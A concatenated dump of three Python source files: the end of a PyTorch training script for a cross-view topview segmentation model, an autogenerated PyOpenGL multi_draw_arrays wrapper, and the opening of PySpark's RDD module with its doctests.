retransform_features = self.models["CycledViewProjection"](features) features = self.models["CrossViewTransformer"](features, transform_feature, retransform_features) # print(inputs["static"].shape) outputs["topview"] = self.models["decoder"](features) outputs["transform_topview"] = self.models["transform_decoder"](transform_feature) if validation: return outputs losses = self.criterion(self.opt, self.weight, inputs, outputs, x_feature, retransform_features) return outputs, losses def run_epoch(self): self.model_optimizer.step() loss = { "loss": 0.0, "topview_loss": 0.0, "transform_loss": 0.0, "transform_topview_loss": 0.0, "loss_discr": 0.0 } accumulation_steps = 8 for batch_idx, inputs in tqdm.tqdm(enumerate(self.train_loader)): outputs, losses = self.process_batch(inputs) self.model_optimizer.zero_grad() losses["loss"] = losses["loss"] / accumulation_steps losses["loss"].backward() # if ((batch_idx + 1) % accumulation_steps) == 0: self.model_optimizer.step() # self.model_optimizer.zero_grad() for loss_name in losses: loss[loss_name] += losses[loss_name].item() # self.scheduler.step() for loss_name in loss: loss[loss_name] /= len(self.train_loader) return loss def validation(self, log): iou, mAP = np.array([0., 0.]), np.array([0., 0.]) trans_iou, trans_mAP = np.array([0., 0.]), np.array([0., 0.]) for batch_idx, inputs in tqdm.tqdm(enumerate(self.val_loader)): with torch.no_grad(): outputs = self.process_batch(inputs, True) pred = np.squeeze( torch.argmax( outputs["topview"].detach(), 1).cpu().numpy()) true = np.squeeze( inputs[self.opt.type + "_gt"].detach().cpu().numpy()) iou += mean_IU(pred, true) mAP += mean_precision(pred, true) iou /= len(self.val_loader) mAP /= len(self.val_loader) # output = ("Epoch: %d | Validation: mIOU: %.4f mAP: %.4f" % (self.epoch, iou[1], mAP[1])) output = ("Epoch: %d | mIoU (0) %.4f mAP (0): %.4f | mIOU (1): %.4f mAP (1): %.4f" % (self.epoch, iou[0], mAP[0], iou[1], mAP[1])) print(output) log.write(output + '\n') log.flush() def save_model(self): save_path = os.path.join( self.opt.save_path, self.opt.model_name, "weights_{}".format( self.epoch) ) if not os.path.exists(save_path): os.makedirs(save_path) for model_name, model in self.models.items(): model_path = os.path.join(save_path, "{}.pth".format(model_name)) state_dict = model.state_dict() state_dict['epoch'] = self.epoch if model_name == "encoder": state_dict["height"] = self.opt.height state_dict["width"] = self.opt.width torch.save(state_dict, model_path) optim_path = os.path.join(save_path, "{}.pth".format("adam")) torch.save(self.model_optimizer.state_dict(), optim_path) def load_model(self): """Load model(s) from disk """ self.opt.load_weights_folder = os.path.expanduser( self.opt.load_weights_folder) assert os.path.isdir(self.opt.load_weights_folder), \ "Cannot find folder {}".format(self.opt.load_weights_folder) print( "loading model from folder {}".format( self.opt.load_weights_folder)) for key in self.models.keys(): if "discriminator" not in key: print("Loading {} weights...".format(key)) path = os.path.join( self.opt.load_weights_folder, "{}.pth".format(key)) model_dict = self.models[key].state_dict() pretrained_dict = torch.load(path) if 'epoch' in pretrained_dict: self.start_epoch = pretrained_dict['epoch'] pretrained_dict = {k: v for k, v in pretrained_dict.items() if k in model_dict} model_dict.update(pretrained_dict) self.models[key].load_state_dict(model_dict) # loading adam state if self.opt.load_weights_folder == "": optimizer_load_path = os.path.join( self.opt.load_weights_folder, "adam.pth") if os.path.isfile(optimizer_load_path): print("Loading Adam weights") optimizer_dict = torch.load(optimizer_load_path) self.model_optimizer.load_state_dict(optimizer_dict) else: print("Cannot find Adam weights so Adam is randomly initialized") def adjust_learning_rate(self, optimizer, epoch, lr_steps): """Sets the learning rate to the initial LR decayed by 10 every 25 epochs""" decay = 0.1 ** (sum(epoch >= np.array(lr_steps))) decay = round(decay, 2) lr = self.opt.lr * decay lr_transform = self.opt.lr_transform * decay decay = self.opt.weight_decay optimizer.param_groups[0]['lr'] = lr_transform optimizer.param_groups[1]['lr'] = lr optimizer.param_groups[0]['weight_decay'] = decay optimizer.param_groups[1]['weight_decay'] = decay # for param_group in optimizer.param_groups: # param_group['lr'] = lr # param_group['lr'] = lr_transform # param_group['weight_decay'] = decay def set_seed(self): seed = self.seed random.seed(seed) np.random.seed(seed) torch.manual_seed(seed) torch.cuda.manual_seed(seed) torch.cuda.manual_seed_all(seed) if __name__ == "__main__": start_time = time.ctime() print(start_time) trainer = Trainer() trainer.train() end_time = time.ctime() print(end_time)
py
7dfa17e2e8c8d9e2431c36ac66b319b483b057c1
'''OpenGL extension EXT.multi_draw_arrays This module customises the behaviour of the OpenGL.raw.GLES1.EXT.multi_draw_arrays to provide a more Python-friendly API The official definition of this extension is available here: http://www.opengl.org/registry/specs/EXT/multi_draw_arrays.txt ''' from OpenGL import platform, constant, arrays from OpenGL import extensions, wrapper import ctypes from OpenGL.raw.GLES1 import _types, _glgets from OpenGL.raw.GLES1.EXT.multi_draw_arrays import * from OpenGL.raw.GLES1.EXT.multi_draw_arrays import _EXTENSION_NAME def glInitMultiDrawArraysEXT(): '''Return boolean indicating whether this extension is available''' from OpenGL import extensions return extensions.hasGLExtension( _EXTENSION_NAME ) # INPUT glMultiDrawArraysEXT.count size not checked against 'primcount' # INPUT glMultiDrawArraysEXT.first size not checked against 'primcount' glMultiDrawArraysEXT=wrapper.wrapper(glMultiDrawArraysEXT).setInputArraySize( 'count', None ).setInputArraySize( 'first', None ) # INPUT glMultiDrawElementsEXT.count size not checked against 'primcount' # INPUT glMultiDrawElementsEXT.indices size not checked against 'primcount' glMultiDrawElementsEXT=wrapper.wrapper(glMultiDrawElementsEXT).setInputArraySize( 'count', None ).setInputArraySize( 'indices', None ) ### END AUTOGENERATED SECTION
py
7dfa17f68a943749d7a6098ca6a4b70fc91d0b91
# # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import copy import sys import os import re import operator import shlex import warnings import heapq import bisect import random import socket from subprocess import Popen, PIPE from tempfile import NamedTemporaryFile from threading import Thread from collections import defaultdict from itertools import chain from functools import reduce from math import sqrt, log, isinf, isnan, pow, ceil if sys.version > '3': basestring = unicode = str else: from itertools import imap as map, ifilter as filter from pyspark.serializers import NoOpSerializer, CartesianDeserializer, \ BatchedSerializer, CloudPickleSerializer, PairDeserializer, \ PickleSerializer, pack_long, AutoBatchedSerializer from pyspark.join import python_join, python_left_outer_join, \ python_right_outer_join, python_full_outer_join, python_cogroup from pyspark.statcounter import StatCounter from pyspark.rddsampler import RDDSampler, RDDRangeSampler, RDDStratifiedSampler from pyspark.storagelevel import StorageLevel from pyspark.resultiterable import ResultIterable from pyspark.shuffle import Aggregator, ExternalMerger, \ get_used_memory, ExternalSorter, ExternalGroupBy from pyspark.traceback_utils import SCCallSiteSync __all__ = ["RDD"] def portable_hash(x): """ This function returns consistent hash code for builtin types, especially for None and tuple with None. The algorithm is similar to that one used by CPython 2.7 >>> portable_hash(None) 0 >>> portable_hash((None, 1)) & 0xffffffff 219750521 """ if sys.version_info >= (3, 2, 3) and 'PYTHONHASHSEED' not in os.environ: raise Exception("Randomness of hash of string should be disabled via PYTHONHASHSEED") if x is None: return 0 if isinstance(x, tuple): h = 0x345678 for i in x: h ^= portable_hash(i) h *= 1000003 h &= sys.maxsize h ^= len(x) if h == -1: h = -2 return int(h) return hash(x) class BoundedFloat(float): """ Bounded value is generated by approximate job, with confidence and low bound and high bound. >>> BoundedFloat(100.0, 0.95, 95.0, 105.0) 100.0 """ def __new__(cls, mean, confidence, low, high): obj = float.__new__(cls, mean) obj.confidence = confidence obj.low = low obj.high = high return obj def _parse_memory(s): """ Parse a memory string in the format supported by Java (e.g. 1g, 200m) and return the value in MB >>> _parse_memory("256m") 256 >>> _parse_memory("2g") 2048 """ units = {'g': 1024, 'm': 1, 't': 1 << 20, 'k': 1.0 / 1024} if s[-1].lower() not in units: raise ValueError("invalid format: " + s) return int(float(s[:-1]) * units[s[-1].lower()]) def _load_from_socket(port, serializer): sock = None # Support for both IPv4 and IPv6. # On most of IPv6-ready systems, IPv6 will take precedence. for res in socket.getaddrinfo("localhost", port, socket.AF_UNSPEC, socket.SOCK_STREAM): af, socktype, proto, canonname, sa = res sock = socket.socket(af, socktype, proto) try: sock.settimeout(3) sock.connect(sa) except socket.error: sock.close() sock = None continue break if not sock: raise Exception("could not open socket") # The RDD materialization time is unpredicable, if we set a timeout for socket reading # operation, it will very possibly fail. See SPARK-18281. sock.settimeout(None) # The socket will be automatically closed when garbage-collected. return serializer.load_stream(sock.makefile("rb", 65536)) def ignore_unicode_prefix(f): """ Ignore the 'u' prefix of string in doc tests, to make it works in both python 2 and 3 """ if sys.version >= '3': # the representation of unicode string in Python 3 does not have prefix 'u', # so remove the prefix 'u' for doc tests literal_re = re.compile(r"(\W|^)[uU](['])", re.UNICODE) f.__doc__ = literal_re.sub(r'\1\2', f.__doc__) return f class Partitioner(object): def __init__(self, numPartitions, partitionFunc): self.numPartitions = numPartitions self.partitionFunc = partitionFunc def __eq__(self, other): return (isinstance(other, Partitioner) and self.numPartitions == other.numPartitions and self.partitionFunc == other.partitionFunc) def __call__(self, k): return self.partitionFunc(k) % self.numPartitions class RDD(object): """ A Resilient Distributed Dataset (RDD), the basic abstraction in Spark. Represents an immutable, partitioned collection of elements that can be operated on in parallel. """ def __init__(self, jrdd, ctx, jrdd_deserializer=AutoBatchedSerializer(PickleSerializer())): self._jrdd = jrdd self.is_cached = False self.is_checkpointed = False self.ctx = ctx self._jrdd_deserializer = jrdd_deserializer self._id = jrdd.id() self.partitioner = None def _pickled(self): return self._reserialize(AutoBatchedSerializer(PickleSerializer())) def id(self): """ A unique ID for this RDD (within its SparkContext). """ return self._id def __repr__(self): return self._jrdd.toString() def __getnewargs__(self): # This method is called when attempting to pickle an RDD, which is always an error: raise Exception( "It appears that you are attempting to broadcast an RDD or reference an RDD from an " "action or transformation. RDD transformations and actions can only be invoked by the " "driver, not inside of other transformations; for example, " "rdd1.map(lambda x: rdd2.values.count() * x) is invalid because the values " "transformation and count action cannot be performed inside of the rdd1.map " "transformation. For more information, see SPARK-5063." ) @property def context(self): """ The L{SparkContext} that this RDD was created on. """ return self.ctx def cache(self): """ Persist this RDD with the default storage level (C{MEMORY_ONLY}). """ self.is_cached = True self.persist(StorageLevel.MEMORY_ONLY) return self def persist(self, storageLevel=StorageLevel.MEMORY_ONLY): """ Set this RDD's storage level to persist its values across operations after the first time it is computed. This can only be used to assign a new storage level if the RDD does not have a storage level set yet. If no storage level is specified defaults to (C{MEMORY_ONLY}). >>> rdd = sc.parallelize(["b", "a", "c"]) >>> rdd.persist().is_cached True """ self.is_cached = True javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel) self._jrdd.persist(javaStorageLevel) return self def unpersist(self): """ Mark the RDD as non-persistent, and remove all blocks for it from memory and disk. """ self.is_cached = False self._jrdd.unpersist() return self def checkpoint(self): """ Mark this RDD for checkpointing. It will be saved to a file inside the checkpoint directory set with L{SparkContext.setCheckpointDir()} and all references to its parent RDDs will be removed. This function must be called before any job has been executed on this RDD. It is strongly recommended that this RDD is persisted in memory, otherwise saving it on a file will require recomputation. """ self.is_checkpointed = True self._jrdd.rdd().checkpoint() def isCheckpointed(self): """ Return whether this RDD is checkpointed and materialized, either reliably or locally. """ return self._jrdd.rdd().isCheckpointed() def localCheckpoint(self): """ Mark this RDD for local checkpointing using Spark's existing caching layer. This method is for users who wish to truncate RDD lineages while skipping the expensive step of replicating the materialized data in a reliable distributed file system. This is useful for RDDs with long lineages that need to be truncated periodically (e.g. GraphX). Local checkpointing sacrifices fault-tolerance for performance. In particular, checkpointed data is written to ephemeral local storage in the executors instead of to a reliable, fault-tolerant storage. The effect is that if an executor fails during the computation, the checkpointed data may no longer be accessible, causing an irrecoverable job failure. This is NOT safe to use with dynamic allocation, which removes executors along with their cached blocks. If you must use both features, you are advised to set L{spark.dynamicAllocation.cachedExecutorIdleTimeout} to a high value. The checkpoint directory set through L{SparkContext.setCheckpointDir()} is not used. """ self._jrdd.rdd().localCheckpoint() def isLocallyCheckpointed(self): """ Return whether this RDD is marked for local checkpointing. Exposed for testing. """ return self._jrdd.rdd().isLocallyCheckpointed() def getCheckpointFile(self): """ Gets the name of the file to which this RDD was checkpointed Not defined if RDD is checkpointed locally. """ checkpointFile = self._jrdd.rdd().getCheckpointFile() if checkpointFile.isDefined(): return checkpointFile.get() def map(self, f, preservesPartitioning=False): """ Return a new RDD by applying a function to each element of this RDD. >>> rdd = sc.parallelize(["b", "a", "c"]) >>> sorted(rdd.map(lambda x: (x, 1)).collect()) [('a', 1), ('b', 1), ('c', 1)] """ def func(_, iterator): return map(f, iterator) return self.mapPartitionsWithIndex(func, preservesPartitioning) def flatMap(self, f, preservesPartitioning=False): """ Return a new RDD by first applying a function to all elements of this RDD, and then flattening the results. >>> rdd = sc.parallelize([2, 3, 4]) >>> sorted(rdd.flatMap(lambda x: range(1, x)).collect()) [1, 1, 1, 2, 2, 3] >>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect()) [(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)] """ def func(s, iterator): return chain.from_iterable(map(f, iterator)) return self.mapPartitionsWithIndex(func, preservesPartitioning) def mapPartitions(self, f, preservesPartitioning=False): """ Return a new RDD by applying a function to each partition of this RDD. >>> rdd = sc.parallelize([1, 2, 3, 4], 2) >>> def f(iterator): yield sum(iterator) >>> rdd.mapPartitions(f).collect() [3, 7] """ def func(s, iterator): return f(iterator) return self.mapPartitionsWithIndex(func, preservesPartitioning) def mapPartitionsWithIndex(self, f, preservesPartitioning=False): """ Return a new RDD by applying a function to each partition of this RDD, while tracking the index of the original partition. >>> rdd = sc.parallelize([1, 2, 3, 4], 4) >>> def f(splitIndex, iterator): yield splitIndex >>> rdd.mapPartitionsWithIndex(f).sum() 6 """ return PipelinedRDD(self, f, preservesPartitioning) def mapPartitionsWithSplit(self, f, preservesPartitioning=False): """ Deprecated: use mapPartitionsWithIndex instead. Return a new RDD by applying a function to each partition of this RDD, while tracking the index of the original partition. >>> rdd = sc.parallelize([1, 2, 3, 4], 4) >>> def f(splitIndex, iterator): yield splitIndex >>> rdd.mapPartitionsWithSplit(f).sum() 6 """ warnings.warn("mapPartitionsWithSplit is deprecated; " "use mapPartitionsWithIndex instead", DeprecationWarning, stacklevel=2) return self.mapPartitionsWithIndex(f, preservesPartitioning) def getNumPartitions(self): """ Returns the number of partitions in RDD >>> rdd = sc.parallelize([1, 2, 3, 4], 2) >>> rdd.getNumPartitions() 2 """ return self._jrdd.partitions().size() def filter(self, f): """ Return a new RDD containing only the elements that satisfy a predicate. >>> rdd = sc.parallelize([1, 2, 3, 4, 5]) >>> rdd.filter(lambda x: x % 2 == 0).collect() [2, 4] """ def func(iterator): return filter(f, iterator) return self.mapPartitions(func, True) def distinct(self, numPartitions=None): """ Return a new RDD containing the distinct elements in this RDD. >>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect()) [1, 2, 3] """ return self.map(lambda x: (x, None)) \ .reduceByKey(lambda x, _: x, numPartitions) \ .map(lambda x: x[0]) def sample(self, withReplacement, fraction, seed=None): """ Return a sampled subset of this RDD. :param withReplacement: can elements be sampled multiple times (replaced when sampled out) :param fraction: expected size of the sample as a fraction of this RDD's size without replacement: probability that each element is chosen; fraction must be [0, 1] with replacement: expected number of times each element is chosen; fraction must be >= 0 :param seed: seed for the random number generator .. note:: This is not guaranteed to provide exactly the fraction specified of the total count of the given :class:`DataFrame`. >>> rdd = sc.parallelize(range(100), 4) >>> 6 <= rdd.sample(False, 0.1, 81).count() <= 14 True """ assert fraction >= 0.0, "Negative fraction value: %s" % fraction return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True) def randomSplit(self, weights, seed=None): """ Randomly splits this RDD with the provided weights. :param weights: weights for splits, will be normalized if they don't sum to 1 :param seed: random seed :return: split RDDs in a list >>> rdd = sc.parallelize(range(500), 1) >>> rdd1, rdd2 = rdd.randomSplit([2, 3], 17) >>> len(rdd1.collect() + rdd2.collect()) 500 >>> 150 < rdd1.count() < 250 True >>> 250 < rdd2.count() < 350 True """ s = float(sum(weights)) cweights = [0.0] for w in weights: cweights.append(cweights[-1] + w / s) if seed is None: seed = random.randint(0, 2 ** 32 - 1) return [self.mapPartitionsWithIndex(RDDRangeSampler(lb, ub, seed).func, True) for lb, ub in zip(cweights, cweights[1:])] # this is ported from scala/spark/RDD.scala def takeSample(self, withReplacement, num, seed=None): """ Return a fixed-size sampled subset of this RDD. .. note:: This method should only be used if the resulting array is expected to be small, as all the data is loaded into the driver's memory. >>> rdd = sc.parallelize(range(0, 10)) >>> len(rdd.takeSample(True, 20, 1)) 20 >>> len(rdd.takeSample(False, 5, 2)) 5 >>> len(rdd.takeSample(False, 15, 3)) 10 """ numStDev = 10.0 if num < 0: raise ValueError("Sample size cannot be negative.") elif num == 0: return [] initialCount = self.count() if initialCount == 0: return [] rand = random.Random(seed) if (not withReplacement) and num >= initialCount: # shuffle current RDD and return samples = self.collect() rand.shuffle(samples) return samples maxSampleSize = sys.maxsize - int(numStDev * sqrt(sys.maxsize)) if num > maxSampleSize: raise ValueError( "Sample size cannot be greater than %d." % maxSampleSize) fraction = RDD._computeFractionForSampleSize( num, initialCount, withReplacement) samples = self.sample(withReplacement, fraction, seed).collect() # If the first sample didn't turn out large enough, keep trying to take samples; # this shouldn't happen often because we use a big multiplier for their initial size. # See: scala/spark/RDD.scala while len(samples) < num: # TODO: add log warning for when more than one iteration was run seed = rand.randint(0, sys.maxsize) samples = self.sample(withReplacement, fraction, seed).collect() rand.shuffle(samples) return samples[0:num] @staticmethod def _computeFractionForSampleSize(sampleSizeLowerBound, total, withReplacement): """ Returns a sampling rate that guarantees a sample of size >= sampleSizeLowerBound 99.99% of the time. How the sampling rate is determined: Let p = num / total, where num is the sample size and total is the total number of data points in the RDD. We're trying to compute q > p such that - when sampling with replacement, we're drawing each data point with prob_i ~ Pois(q), where we want to guarantee Pr[s < num] < 0.0001 for s = sum(prob_i for i from 0 to total), i.e. the failure rate of not having a sufficiently large sample < 0.0001. Setting q = p + 5 * sqrt(p/total) is sufficient to guarantee 0.9999 success rate for num > 12, but we need a slightly larger q (9 empirically determined). - when sampling without replacement, we're drawing each data point with prob_i ~ Binomial(total, fraction) and our choice of q guarantees 1-delta, or 0.9999 success rate, where success rate is defined the same as in sampling with replacement. """ fraction = float(sampleSizeLowerBound) / total if withReplacement: numStDev = 5 if (sampleSizeLowerBound < 12): numStDev = 9 return fraction + numStDev * sqrt(fraction / total) else: delta = 0.00005 gamma = - log(delta) / total return min(1, fraction + gamma + sqrt(gamma * gamma + 2 * gamma * fraction)) def union(self, other): """ Return the union of this RDD and another one. >>> rdd = sc.parallelize([1, 1, 2, 3]) >>> rdd.union(rdd).collect() [1, 1, 2, 3, 1, 1, 2, 3] """ if self._jrdd_deserializer == other._jrdd_deserializer: rdd = RDD(self._jrdd.union(other._jrdd), self.ctx, self._jrdd_deserializer) else: # These RDDs contain data in different serialized formats, so we # must normalize them to the default serializer. self_copy = self._reserialize() other_copy = other._reserialize() rdd = RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx, self.ctx.serializer) if (self.partitioner == other.partitioner and self.getNumPartitions() == rdd.getNumPartitions()): rdd.partitioner = self.partitioner return rdd def intersection(self, other): """ Return the intersection of this RDD and another one. The output will not contain any duplicate elements, even if the input RDDs did. .. note:: This method performs a shuffle internally. >>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5]) >>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8]) >>> rdd1.intersection(rdd2).collect() [1, 2, 3] """ return self.map(lambda v: (v, None)) \ .cogroup(other.map(lambda v: (v, None))) \ .filter(lambda k_vs: all(k_vs[1])) \ .keys() def _reserialize(self, serializer=None): serializer = serializer or self.ctx.serializer if self._jrdd_deserializer != serializer: self = self.map(lambda x: x, preservesPartitioning=True) self._jrdd_deserializer = serializer return self def __add__(self, other): """ Return the union of this RDD and another one. >>> rdd = sc.parallelize([1, 1, 2, 3]) >>> (rdd + rdd).collect() [1, 1, 2, 3, 1, 1, 2, 3] """ if not isinstance(other, RDD): raise TypeError return self.union(other) def repartitionAndSortWithinPartitions(self, numPartitions=None, partitionFunc=portable_hash, ascending=True, keyfunc=lambda x: x): """ Repartition the RDD according to the given partitioner and, within each resulting partition, sort records by their keys. >>> rdd = sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)]) >>> rdd2 = rdd.repartitionAndSortWithinPartitions(2, lambda x: x % 2, 2) >>> rdd2.glom().collect() [[(0, 5), (0, 8), (2, 6)], [(1, 3), (3, 8), (3, 8)]] """ if numPartitions is None: numPartitions = self._defaultReducePartitions() memory = _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m")) serializer = self._jrdd_deserializer def sortPartition(iterator): sort = ExternalSorter(memory * 0.9, serializer).sorted return iter(sort(iterator, key=lambda k_v: keyfunc(k_v[0]), reverse=(not ascending))) return self.partitionBy(numPartitions, partitionFunc).mapPartitions(sortPartition, True) def sortByKey(self, ascending=True, numPartitions=None, keyfunc=lambda x: x): """ Sorts this RDD, which is assumed to consist of (key, value) pairs. >>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)] >>> sc.parallelize(tmp).sortByKey().first() ('1', 3) >>> sc.parallelize(tmp).sortByKey(True, 1).collect() [('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)] >>> sc.parallelize(tmp).sortByKey(True, 2).collect() [('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)] >>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)] >>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)]) >>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect() [('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5),...('white', 9), ('whose', 6)] """ if numPartitions is None: numPartitions = self._defaultReducePartitions() memory = self._memory_limit() serializer = self._jrdd_deserializer def sortPartition(iterator): sort = ExternalSorter(memory * 0.9, serializer).sorted return iter(sort(iterator, key=lambda kv: keyfunc(kv[0]), reverse=(not ascending))) if numPartitions == 1: if self.getNumPartitions() > 1: self = self.coalesce(1) return self.mapPartitions(sortPartition, True) # first compute the boundary of each part via sampling: we want to partition # the key-space into bins such that the bins have roughly the same # number of (key, value) pairs falling into them rddSize = self.count() if not rddSize: return self # empty RDD maxSampleSize = numPartitions * 20.0 # constant from Spark's RangePartitioner fraction = min(maxSampleSize / max(rddSize, 1), 1.0) samples = self.sample(False, fraction, 1).map(lambda kv: kv[0]).collect() samples = sorted(samples, key=keyfunc) # we have numPartitions many parts but one of the them has # an implicit boundary bounds = [samples[int(len(samples) * (i + 1) / numPartitions)] for i in range(0, numPartitions - 1)] def rangePartitioner(k): p = bisect.bisect_left(bounds, keyfunc(k)) if ascending: return p else: return numPartitions - 1 - p return self.partitionBy(numPartitions, rangePartitioner).mapPartitions(sortPartition, True) def sortBy(self, keyfunc, ascending=True, numPartitions=None): """ Sorts this RDD by the given keyfunc >>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)] >>> sc.parallelize(tmp).sortBy(lambda x: x[0]).collect() [('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)] >>> sc.parallelize(tmp).sortBy(lambda x: x[1]).collect() [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)] """ return self.keyBy(keyfunc).sortByKey(ascending, numPartitions).values() def glom(self): """ Return an RDD created by coalescing all elements within each partition into a list. >>> rdd = sc.parallelize([1, 2, 3, 4], 2) >>> sorted(rdd.glom().collect()) [[1, 2], [3, 4]] """ def func(iterator): yield list(iterator) return self.mapPartitions(func) def cartesian(self, other): """ Return the Cartesian product of this RDD and another one, that is, the RDD of all pairs of elements C{(a, b)} where C{a} is in C{self} and C{b} is in C{other}. >>> rdd = sc.parallelize([1, 2]) >>> sorted(rdd.cartesian(rdd).collect()) [(1, 1), (1, 2), (2, 1), (2, 2)] """ # Due to batching, we can't use the Java cartesian method. deserializer = CartesianDeserializer(self._jrdd_deserializer, other._jrdd_deserializer) return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer) def groupBy(self, f, numPartitions=None, partitionFunc=portable_hash): """ Return an RDD of grouped items. >>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8]) >>> result = rdd.groupBy(lambda x: x % 2).collect() >>> sorted([(x, sorted(y)) for (x, y) in result]) [(0, [2, 8]), (1, [1, 1, 3, 5])] """ return self.map(lambda x: (f(x), x)).groupByKey(numPartitions, partitionFunc) @ignore_unicode_prefix def pipe(self, command, env=None, checkCode=False): """ Return an RDD created by piping elements to a forked external process. >>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect() [u'1', u'2', u'', u'3'] :param checkCode: whether or not to check the return value of the shell command. """ if env is None: env = dict() def func(iterator): pipe = Popen( shlex.split(command), env=env, stdin=PIPE, stdout=PIPE) def pipe_objs(out): for obj in iterator: s = str(obj).rstrip('\n') + '\n' out.write(s.encode('utf-8')) out.close() Thread(target=pipe_objs, args=[pipe.stdin]).start() def check_return_code(): pipe.wait() if checkCode and pipe.returncode: raise Exception("Pipe function `%s' exited " "with error code %d" % (command, pipe.returncode)) else: for i in range(0): yield i return (x.rstrip(b'\n').decode('utf-8') for x in chain(iter(pipe.stdout.readline, b''), check_return_code())) return self.mapPartitions(func) def foreach(self, f): """ Applies a function to all elements of this RDD. >>> def f(x): print(x) >>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f) """ def processPartition(iterator): for x in iterator: f(x) return iter([]) self.mapPartitions(processPartition).count() # Force evaluation def foreachPartition(self, f): """ Applies a function to each partition of this RDD. >>> def f(iterator): ... for x in iterator: ... print(x) >>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f) """ def func(it): r = f(it) try: return iter(r) except TypeError: return iter([]) self.mapPartitions(func).count() # Force evaluation def collect(self): """ Return a list that contains all of the elements in this RDD. .. note:: This method should only be used if the resulting array is expected to be small, as all the data is loaded into the driver's memory. """ with SCCallSiteSync(self.context) as css: port = self.ctx._jvm.PythonRDD.collectAndServe(self._jrdd.rdd()) return list(_load_from_socket(port, self._jrdd_deserializer)) def reduce(self, f): """ Reduces the elements of this RDD using the specified commutative and associative binary operator. Currently reduces partitions locally. >>> from operator import add >>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add) 15 >>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add) 10 >>> sc.parallelize([]).reduce(add) Traceback (most recent call last): ... ValueError: Can not reduce() empty RDD """ def func(iterator): iterator = iter(iterator) try: initial = next(iterator) except StopIteration: return yield reduce(f, iterator, initial) vals = self.mapPartitions(func).collect() if vals: return reduce(f, vals) raise ValueError("Can not reduce() empty RDD") def treeReduce(self, f, depth=2): """ Reduces the elements of this RDD in a multi-level tree pattern. :param depth: suggested depth of the tree (default: 2) >>> add = lambda x, y: x + y >>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10) >>> rdd.treeReduce(add) -5 >>> rdd.treeReduce(add, 1) -5 >>> rdd.treeReduce(add, 2) -5 >>> rdd.treeReduce(add, 5) -5 >>> rdd.treeReduce(add, 10) -5 """ if depth < 1: raise ValueError("Depth cannot be smaller than 1 but got %d." % depth) zeroValue = None, True # Use the second entry to indicate whether this is a dummy value. def op(x, y): if x[1]: return y elif y[1]: return x else: return f(x[0], y[0]), False reduced = self.map(lambda x: (x, False)).treeAggregate(zeroValue, op, op, depth) if reduced[1]: raise ValueError("Cannot reduce empty RDD.") return reduced[0] def fold(self, zeroValue, op): """ Aggregate the elements of each partition, and then the results for all the partitions, using a given associative function and a neutral "zero value." The function C{op(t1, t2)} is allowed to modify C{t1} and return it as its result value to avoid object allocation; however, it should not modify C{t2}. This behaves somewhat differently from fold operations implemented for non-distributed collections in functional languages like Scala. This fold operation may be applied to partitions individually, and then fold those results into the final result, rather than apply the fold to each element sequentially in some defined ordering. For functions that are not commutative, the result may differ from that of a fold applied to a non-distributed collection. >>> from operator import add >>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add) 15 """ def func(iterator): acc = zeroValue for obj in iterator: acc = op(acc, obj) yield acc # collecting result of mapPartitions here ensures that the copy of # zeroValue provided to each partition is unique from the one provided # to the final reduce call vals = self.mapPartitions(func).collect() return reduce(op, vals, zeroValue) def aggregate(self, zeroValue, seqOp, combOp): """ Aggregate the elements of each partition, and then the results for all the partitions, using a given combine functions and a neutral "zero value." The functions C{op(t1, t2)} is allowed to modify C{t1} and return it as its result value to avoid object allocation; however, it should not modify C{t2}. The first function (seqOp) can return a different result type, U, than the type of this RDD. Thus, we need one operation for merging a T into an U and one operation for merging two U >>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1)) >>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1])) >>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp) (10, 4) >>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp) (0, 0) """ def func(iterator): acc = zeroValue for obj in iterator: acc = seqOp(acc, obj) yield acc # collecting result of mapPartitions here ensures that the copy of # zeroValue provided to each partition is unique from the one provided # to the final reduce call vals = self.mapPartitions(func).collect() return reduce(combOp, vals, zeroValue) def treeAggregate(self, zeroValue, seqOp, combOp, depth=2): """ Aggregates the elements of this RDD in a multi-level tree pattern. :param depth: suggested depth of the tree (default: 2) >>> add = lambda x, y: x + y 